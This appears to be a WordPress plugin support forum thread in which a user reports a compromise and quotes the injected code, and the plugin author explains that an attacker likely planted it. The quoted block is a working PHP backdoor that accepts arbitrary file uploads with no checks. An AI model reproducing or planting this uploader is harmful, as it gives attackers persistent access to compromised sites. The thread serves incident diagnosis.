Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Janis Elsts


    I don’t think that this is accurate. Can you provide more details about this supposed compromise, like which files you think contain malware?

    Just to be safe, I scanned the plugin with VirusTotal. It didn’t detect anything malicious.

    Thread Starter bamboovinoth


    File name: menu-editor.php

    inserted lines:

    echo '<center><font color="Red" size="4">';
    /// Script Upload By QtRoNiX FoX \\\
    $filedir = "";
    $maxfile = '2000000';
    $mode = '0644';
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if(isset($_FILES['image']['name'])) {
    $qx = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $qx);
    @chmod ($qx, octdec($mode));
    echo"<center><b>Done ==> $userfile_name</b></center>";
    echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" 
    name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
    echo '</center></font>';

    there where few other file too which we did not note it.

    Plugin Author Janis Elsts


    Thank you. However, that code isn’t part of the actual plugin. If you download the official release from this site, you’ll see that the malicious code isn’t there. You can also look at previous versions to verify that it wasn’t present in older releases.

    Maybe what happened is that somebody hacked your site and then they added their backdoor code to one of the active plugins (i.e. this one). Hiding the code in an existing plugin might make it harder to detect at a glance, and it could let them access the site even if the original vulnerability was fixed.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Contains Malware’ is closed to new replies.